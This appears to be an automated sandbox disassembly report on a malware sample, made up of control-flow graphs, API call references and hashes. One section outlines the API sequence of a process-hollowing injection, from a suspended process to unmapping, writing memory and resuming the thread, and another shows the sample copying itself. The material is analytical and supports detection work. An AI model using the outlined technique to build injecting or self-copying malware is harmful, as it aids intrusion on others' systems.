                                                                      • Not Executed
                                                                      control_flow_graph 389 11d9d04-11d9d13 390 11d9d29-11d9d5b call 11e7684 389->390 391 11d9d15-11d9d23 389->391 398 11d9d5d-11d9d6c 390->398 399 11d9d8c-11d9e02 call 11e5ac0 call 11d2ce0 call 11e62f0 call 11e5f70 390->399 391->390 392 11da181 call 11ebcdc 391->392 397 11da186 392->397 400 11da18b-11da1b8 call 11e59a0 * 2 CopyFileA call 11d5120 397->400 401 11da186 call 11ebcdc 397->401 402 11d9d6e-11d9d7c 398->402 403 11d9d82-11d9d89 call 11e7684 398->403 424 11d9e04-11d9e13 399->424 425 11d9e33-11d9e5b 399->425 418 11da209-11da20b call 11eaa9f 400->418 419 11da1ba-11da206 call 11e5a80 call 11e5ac0 call 11e5a80 call 11d3b10 400->419 401->400 402->392 402->403 403->399 426 11da210-11da215 call 11ebcdc 418->426 419->418 428 11d9e29-11d9e30 call 11e7684 424->428 429 11d9e15-11d9e23 424->429 431 11d9e5d-11d9e6c 425->431 432 11d9e8c-11d9edf GetModuleFileNameA 425->432 428->425 429->397 429->428 436 11d9e6e-11d9e7c 431->436 437 11d9e82-11d9e89 call 11e7684 431->437 438 11d9ee0-11d9ee5 432->438 436->397 436->437 437->432 438->438 442 11d9ee7-11d9f38 call 11e5e20 438->442 449 11d9f3a-11d9f3d 442->449 450 11d9f94-11d9fb4 call 11eab6c 442->450 453 11d9f3f 449->453 454 11d9f51-11d9f54 449->454 459 11d9fdc-11da000 call 11eab6c 450->459 460 11d9fb6-11d9fd9 call 11eabfa call 11eae87 450->460 456 11d9f40-11d9f44 453->456 457 11d9f8a 454->457 458 11d9f56-11d9f5a 454->458 456->458 461 11d9f46-11d9f4f 456->461 464 11d9f8c-11d9f8e 457->464 462 11d9f5c-11d9f5f 458->462 463 11d9f83-11d9f88 458->463 478 11da010-11da06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 459->478 479 11da002-11da00b call 11eabfa 459->479 460->459 461->454 461->456 462->457 466 11d9f61-11d9f67 462->466 463->464 464->450 468 11da083-11da08c 464->468 466->463 470 11d9f69-11d9f6c 466->470 472 11da0bf-11da0e3 468->472 473 11da08e-11da099 468->473 470->457 477 11d9f6e-11d9f74 470->477 474 11da0e5-11da0f0 472->474 475 11da110-11da134 472->475 480 11da0af-11da0bc call 11e7684 473->480 481 11da09b-11da0a9 473->481 483 11da106-11da10d call 11e7684 474->483 484 11da0f2-11da100 474->484 487 11da165-11da180 call 11e7012 475->487 488 11da136-11da145 475->488 477->463 489 11d9f76-11d9f79 477->489 501 11da06f-11da071 478->501 502 11da077-11da07d 478->502 479->418 479->468 480->472 481->426 481->480 483->475 484->426 484->483 495 11da15b-11da162 call 11e7684 488->495 496 11da147-11da155 488->496 489->457 497 11d9f7b-11d9f81 489->497 495->487 496->426 496->495 497->457 497->463 501->400 501->502 502->468
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 011D9EB5
                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 011DA1A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyModuleName
                                                                      • String ID:
                                                                      • API String ID: 4108865673-0
                                                                      • Opcode ID: 0f3add74d98103cbaf77194bc2daff9a9a892de9cef1d903d6f7cf4eca4cfc51
                                                                      • Instruction ID: bd172c3ff7e06874141e0be945fb8e8b0709fc03dde4229aadb551de32814796
                                                                      • Opcode Fuzzy Hash: 0f3add74d98103cbaf77194bc2daff9a9a892de9cef1d903d6f7cf4eca4cfc51
                                                                      • Instruction Fuzzy Hash: C0C12BB1A001188BEB2CDB38CC587DDBF75AF51218F4442D8D649A72C2DB359EC58F66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 505 11ec59c-11ec5b2 506 11ec6bd 505->506 507 11ec5b8-11ec5d8 505->507 508 11ec6c0-11ec6c4 506->508 509 11ec5de-11ec5ea 507->509 510 11ec67b-11ec6bb call 11ea831 * 4 507->510 512 11ec5ee-11ec5f3 509->512 513 11ec5ec 509->513 510->508 515 11ec5f8-11ec5fa 512->515 516 11ec5f5-11ec5f7 512->516 513->512 517 11ec5fc-11ec600 call 11f0e41 515->517 518 11ec619-11ec637 call 11f0e41 call 11ed653 515->518 516->515 523 11ec605-11ec617 call 11ed653 517->523 518->506 532 11ec63d-11ec667 518->532 523->518 523->532 532->510 534 11ec669-11ec66c 532->534 535 11ec66e-11ec676 534->535 535->535 536 11ec678 535->536 536->510
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 659f4f3fbfdc27f6f1588d91c5e4004e483787ceca99c27e40ddecea9e14a165
                                                                      • Instruction ID: bfb9e48ce07ae4e2bd29d24f24ba49552d1a250c8c6eb7176c3cb3e402db9bdb
                                                                      • Opcode Fuzzy Hash: 659f4f3fbfdc27f6f1588d91c5e4004e483787ceca99c27e40ddecea9e14a165
                                                                      • Instruction Fuzzy Hash: 9E41B336E006109FDB28DFA8C884A5EB7F6EF89714F1545A9D916EB351D730ED02CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 537 11f4d8f-11f4d9a 538 11f4d9c-11f4da5 call 11edb3c 537->538 539 11f4da7-11f4dad 537->539 547 11f4dcb-11f4dcd 538->547 541 11f4daf-11f4db6 call 11ed653 539->541 542 11f4db8-11f4dbb 539->542 554 11f4dc8 541->554 545 11f4dbd-11f4dc2 call 11eb7f0 542->545 546 11f4de2-11f4df4 RtlReAllocateHeap 542->546 545->554 548 11f4dce-11f4dd5 call 11eccd1 546->548 549 11f4df6 546->549 548->545 557 11f4dd7-11f4de0 call 11ebd47 548->557 553 11f4dca 549->553 553->547 554->553 557->545 557->546
                                                                      APIs
                                                                      • _free.LIBCMT ref: 011F4DB0
                                                                        • Part of subcall function 011EDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EDB6E
                                                                      • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,011F0E8A,?,00000004,00000002,?,?,?,011EC625,?,00000002), ref: 011F4DEC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap$_free
                                                                      • String ID:
                                                                      • API String ID: 1482568997-0
                                                                      • Opcode ID: 2a6439adf6706fd6afb2134fe174e85c05adbca6a9bc89060be5a4efde1366e3
                                                                      • Instruction ID: e3c890f6d3f0041808bbc0de4192799d3146ea68a659b5038f6ed69ba337704e
                                                                      • Opcode Fuzzy Hash: 2a6439adf6706fd6afb2134fe174e85c05adbca6a9bc89060be5a4efde1366e3
                                                                      • Instruction Fuzzy Hash: 62F0BB3164191666DB3E2EAABC04FAF3B9C9FB1575F16022DFF589A9D0DF30C44081A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 560 11e5e20-11e5e3c 561 11e5e3e-11e5e43 560->561 562 11e5e64-11e5e6a 560->562 563 11e5e47-11e5e61 call 11e9bb0 561->563 564 11e5e45 561->564 565 11e5f4e call 11e69f0 562->565 566 11e5e70-11e5e7b 562->566 564->563 572 11e5f53-11e5f58 call 11d2150 565->572 569 11e5e7d-11e5e82 566->569 570 11e5e84-11e5e91 566->570 573 11e5ea2-11e5eb6 569->573 574 11e5e9a-11e5e9f 570->574 575 11e5e93-11e5e98 570->575 577 11e5edd-11e5edf 573->577 578 11e5eb8-11e5ebd 573->578 574->573 575->573 579 11e5eec 577->579 580 11e5ee1-11e5ee2 call 11e7403 577->580 578->572 582 11e5ec3-11e5ed0 call 11e7403 578->582 584 11e5eee-11e5f11 call 11ea270 579->584 586 11e5ee7-11e5eea 580->586 590 11e5f49 call 11ebcdc 582->590 591 11e5ed2-11e5edb 582->591 593 11e5f3c-11e5f46 584->593 594 11e5f13-11e5f1e 584->594 586->584 590->565 591->584 595 11e5f32-11e5f39 call 11e7684 594->595 596 11e5f20-11e5f2e 594->596 595->593 596->590 597 11e5f30 596->597 597->595
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 011E5F53
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID:
                                                                      • API String ID: 118556049-0
                                                                      • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                      • Instruction ID: fa49e8b60cd02adb4ea2594d3b29e8e995cb1f899d61d01e5401b585069e7987
                                                                      • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                      • Instruction Fuzzy Hash: 5D312875700A009BD72C9EFC988856EFBEAEF55228B14437EE925C7381DB709D448792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 011D218E
                                                                        • Part of subcall function 011E8483: RaiseException.KERNEL32(E06D7363,00000001,00000003,011D216C,?,?,?,011D216C,?,01206D1C), ref: 011E84E3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                      • String ID:
                                                                      • API String ID: 3109751735-0
                                                                      • Opcode ID: ec5fab1d3333aac8503318a2db848b0c8d933b19d294be03a9c66e73158c2b52
                                                                      • Instruction ID: 00a9d9cd189fea6b3dbbcd03d6f00cd2c9c9c081a802aab7b409010de99b0489
                                                                      • Opcode Fuzzy Hash: ec5fab1d3333aac8503318a2db848b0c8d933b19d294be03a9c66e73158c2b52
                                                                      • Instruction Fuzzy Hash: 3401D675810A0E77DB1CFAE8EC0899DBBECDE10118B508629FB14A6590FB70EA54C6D2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 622 11ed4b1-11ed4d7 call 11ed287 625 11ed4d9-11ed4eb call 11f268f 622->625 626 11ed530-11ed533 622->626 628 11ed4f0-11ed4f5 625->628 628->626 629 11ed4f7-11ed52f 628->629
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: f4b1fd8fa4d268923be55267a6ebfd6a0f2946132b5fd3696a916a9b9eccb385
                                                                      • Instruction ID: 75d55cff6ba111557c4582d6548827b56301a06493c951e32bc2fece7b20b65a
                                                                      • Opcode Fuzzy Hash: f4b1fd8fa4d268923be55267a6ebfd6a0f2946132b5fd3696a916a9b9eccb385
                                                                      • Instruction Fuzzy Hash: 83111871A0420AAFCF09DF98E94599B7BF4EF48318F054059F809AB251E770EA11CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 630 11eed56-11eed63 call 11ef925 632 11eed68-11eed73 630->632 633 11eed79-11eed81 632->633 634 11eed75-11eed77 632->634 635 11eedc4-11eedd0 call 11ed653 633->635 636 11eed83-11eed87 633->636 634->635 637 11eed89-11eedbe call 11ee503 636->637 642 11eedc0-11eedc3 637->642 642->635
                                                                      APIs
                                                                        • Part of subcall function 011EF925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,011EE0E6,00000001,00000364,00000006,000000FF,?,?,011E8272,?), ref: 011EF966
                                                                      • _free.LIBCMT ref: 011EEDC5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                      • Instruction ID: dfc452f240516c4d81445353a59317be7de53271ffa022d858bdb39afdb3a2b8
                                                                      • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                      • Instruction Fuzzy Hash: 1E014972604717ABC3298FDDD88899EFFD8FB053B0F01062AE559A76C0E7706810CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 643 11f2621-11f2655 call 11eadd0 call 11ead30 648 11f265c-11f2671 call 11f26af 643->648 649 11f2657-11f265a 643->649 654 11f2676-11f2679 648->654 650 11f267b-11f267f 649->650 652 11f268a-11f268e 650->652 653 11f2681-11f2689 call 11ed653 650->653 653->652 654->650
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                      • Instruction ID: 7299486a8485b1bafe2ea825b7fe613660c8bc5449eea7e187596ffbee2c514c
                                                                      • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                      • Instruction Fuzzy Hash: 9B012C72C0115AAFCF05AFE89C05AEE7FB5BF18214F144569AE14A2160E7328A60DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 657 11ef925-11ef930 658 11ef93e-11ef944 657->658 659 11ef932-11ef93c 657->659 661 11ef95d-11ef96e RtlAllocateHeap 658->661 662 11ef946-11ef947 658->662 659->658 660 11ef972-11ef97d call 11eb7f0 659->660 668 11ef97f-11ef981 660->668 663 11ef949-11ef950 call 11eccd1 661->663 664 11ef970 661->664 662->661 663->660 670 11ef952-11ef95b call 11ebd47 663->670 664->668 670->660 670->661
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,011EE0E6,00000001,00000364,00000006,000000FF,?,?,011E8272,?), ref: 011EF966
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 29e1b6ffda2b588abb048351bb30277c14021b4c3584210445035c9cb70dd7f7
                                                                      • Instruction ID: d97b6aca2f8c8e7aa6f8ac8925a5c080dfe4602d7866324543c2f2e6ca6352bb
                                                                      • Opcode Fuzzy Hash: 29e1b6ffda2b588abb048351bb30277c14021b4c3584210445035c9cb70dd7f7
                                                                      • Instruction Fuzzy Hash: E2F02431605E2776AB2E1AFA8C0CB5B3BC8AF512B4B058111BD94971C0EB20D80287F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 673 11edb3c-11edb48 674 11edb7a-11edb85 call 11eb7f0 673->674 675 11edb4a-11edb4c 673->675 682 11edb87-11edb89 674->682 677 11edb4e-11edb4f 675->677 678 11edb65-11edb76 RtlAllocateHeap 675->678 677->678 679 11edb78 678->679 680 11edb51-11edb58 call 11eccd1 678->680 679->682 680->674 685 11edb5a-11edb63 call 11ebd47 680->685 685->674 685->678
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EDB6E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 912b65e068649dc22c0f8808a90a12ca128436f368c54ee9542488de2f34a426
                                                                      • Instruction ID: 2c7aaa35fc47a1ec527cb2d1f4633bfc8a3d586abf554169cd0f6eb086a1e67e
                                                                      • Opcode Fuzzy Hash: 912b65e068649dc22c0f8808a90a12ca128436f368c54ee9542488de2f34a426
                                                                      • Instruction Fuzzy Hash: 76E06C35545E1167EE3D15E97C0DB5B7AD9AB532B5F0A0114ED15971C4EB10C44082E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,011F2758,?,?,00000000,?,011F2758,00000000,0000000C), ref: 011F2385
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 950ca8c887abc5aaa3508e3024c06274d67f2588423288dc843e103504f7b89d
                                                                      • Instruction ID: dd081eea39a2c1684c4bea2effc64ecf9f2ae51994a0bf48a0eaec3244ead512
                                                                      • Opcode Fuzzy Hash: 950ca8c887abc5aaa3508e3024c06274d67f2588423288dc843e103504f7b89d
                                                                      • Instruction Fuzzy Hash: 19D06C3200010DBBDF128E85DD46EDA3FAAFB48714F014010BA1856020C732E871EB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 011D38E6
                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 011D394B
                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 011D3964
                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 011D397F
                                                                      • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 011D39A3
                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 011D39BE
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 011D39C5
                                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 011D39ED
                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 011D3A0E
                                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 011D3A5A
                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 011D3A96
                                                                      • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 011D3AB2
                                                                      • ResumeThread.KERNEL32(?,?,?,00000000), ref: 011D3ABE
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 011D3ACC
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 011D3AED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                      • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                      • API String ID: 4033543172-1522589568
                                                                      • Opcode ID: 651151569e1297f776b6b97f72158d04800098ec9a7528ff0c824d6bbbd45d38
                                                                      • Instruction ID: 5211f317e0f1b7042b30d5179bf1a2238a6d97709ea6ebba16d2b2587766b244
                                                                      • Opcode Fuzzy Hash: 651151569e1297f776b6b97f72158d04800098ec9a7528ff0c824d6bbbd45d38
                                                                      • Instruction Fuzzy Hash: 43B1D571A00618EFEB29CF68DC49BEABBB5FF48714F100269F615A62D0D771A980CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(00000000,00000000,?,0120918C,9BC7B195,?,00000000,00000000), ref: 011D7F61
                                                                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 011D7F67
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorLastMutex
                                                                      • String ID:
                                                                      • API String ID: 1925916568-0
                                                                      • Opcode ID: 87c8ef8af8138801b9137551380ae0f96f91a8dcb0000223eac7e9a0e22f347e
                                                                      • Instruction ID: b1d3895078de0b52cd74d695d71ee99f2379f4dab72423291a50e5901374d681
                                                                      • Opcode Fuzzy Hash: 87c8ef8af8138801b9137551380ae0f96f91a8dcb0000223eac7e9a0e22f347e
